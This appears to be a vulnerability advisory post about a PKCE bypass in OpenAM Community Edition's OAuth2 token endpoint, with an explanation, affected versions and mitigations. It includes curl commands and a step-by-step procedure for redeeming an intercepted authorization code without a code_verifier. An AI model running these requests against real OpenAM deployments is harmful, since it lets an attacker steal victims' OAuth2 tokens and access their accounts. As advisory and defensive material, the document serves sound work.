OpenAM, Improper Authorization (PKCE Bypass), CVE-2026-XXXX (Medium) -DC-Jun2026-737

By /

Listen to this Post

How the CVE Works

The vulnerability resides in OpenAM’s OAuth2 authorization-code grant implementation, specifically in how PKCE (Proof Key for Code Exchange) protection is enforced. PKCE, defined in RFC 7636, is designed to protect authorization codes from interception attacks by requiring the client to provide a `code_verifier` that matches the `code_challenge` sent during the authorization request.
During the authorize endpoint flow, OpenAM correctly stores the `code_challenge` on the issued authorization code. However, the token endpoint’s verification logic contains a critical flaw: it only requires the `code_verifier` parameter when the realm-wide `codeVerifierEnforced` setting is enabled. This setting ships disabled by default in OpenAM Community Edition through version 16.0.6.
When `codeVerifierEnforced` is disabled, the token endpoint checks the stored challenge only if the caller supplies a code_verifier. If the attacker simply omits the `code_verifier` parameter entirely, the PKCE verification is skipped and the authorization code is redeemed without any proof of possession. This is an Improper Authorization vulnerability (CWE-285).
An attacker who intercepts an authorization code (e.g., through a man-in-the-middle attack or by sniffing network traffic) can exchange it for access tokens and refresh tokens without knowing the original code_verifier. The bypass is specifically the missing-parameter path — supplying an incorrect verifier is still rejected, but omitting it bypasses the check entirely.
The vulnerability affects OpenAM Community Edition through version 16.0.6 and was patched in version 16.1.1.

DailyCVE Form:

Platform: ……. OpenAM Community Edition
Version: …….. 16.0.6 and earlier
Vulnerability: … PKCE verification bypass
Severity: …….. Medium (CVSS: 5.3)
date: ………… 2026-06-29

Prediction: …… 2026-07-15 (estimated)

What Undercode Say:

Check current OpenAM version
curl -s http://openam-host:8080/openam/version | jq '.version'
Test PKCE bypass (authorization code interception scenario)
Step 1: Intercept authorization code from /oauth2/authorize response
AUTH_CODE="intercepted_auth_code_12345"
Step 2: Attempt token exchange WITHOUT code_verifier (bypass)
curl -X POST http://openam-host:8080/openam/oauth2/access_token \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "grant_type=authorization_code" \
-d "code=$AUTH_CODE" \
-d "client_id=public_client" \
-d "redirect_uri=https://client.example.com/callback"
If vulnerable, this returns access_token without code_verifier
Step 3: Verify realm configuration (requires admin access)
curl -s http://openam-host:8080/openam/json/realms/root/oauth2 \
-H "Cookie: iPlanetDirectoryPro=$ADMIN_TOKEN" | jq '.codeVerifierEnforced'
Returns "false" if vulnerable

Exploit:

  1. Intercept an OAuth2 authorization code from the `/oauth2/authorize` endpoint response (e.g., via network sniffing or man-in-the-middle).
  2. Extract the `code` parameter from the callback URL.

3. Send a POST request to `/oauth2/access_token` with:

– `grant_type=authorization_code`
– `code=`
– `client_id=`
– `redirect_uri=`
– Omit the `code_verifier` parameter entirely
4. The token endpoint accepts the request and returns `access_token` and `refresh_token` without validating PKCE.
5. The attacker can now use the tokens to access protected resources on behalf of the victim.

Protection:

  • Update to OpenAM Community Edition version 16.1.1 or later.
  • Enable the `codeVerifierEnforced` setting at the realm level: 
    curl -X PUT http://openam-host:8080/openam/json/realms/root/oauth2 \
-H "Content-Type: application/json" \
-H "Cookie: iPlanetDirectoryPro=$ADMIN_TOKEN" \
-d '{"codeVerifierEnforced": true}'
  • Monitor OAuth2 token endpoints for requests missing `code_verifier` (potential exploitation attempts).
  • Rotate client secrets and consider migrating to confidential clients where client authentication provides an additional layer of protection.
  • Implement additional logging and alerting for anomalous token exchange patterns.

Impact:

  • Confidentiality: An attacker can access victim’s protected resources by obtaining valid OAuth2 tokens.
  • Integrity: Attacker can perform actions on behalf of the victim within the scope of the stolen tokens.
  • Availability: Not directly impacted, but token theft can lead to account compromise and subsequent denial of service.
  • Affected Deployments: OpenAM Community Edition through version 16.0.6 with OAuth2 Provider service enabled and `codeVerifierEnforced` set to `false` (default).
  • Attack Vector: Network-based interception of authorization codes or compromise of the authorization code transmission channel.
  • Prerequisites: Attacker must intercept a valid authorization code; for confidential clients, attacker also needs client authentication credentials.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top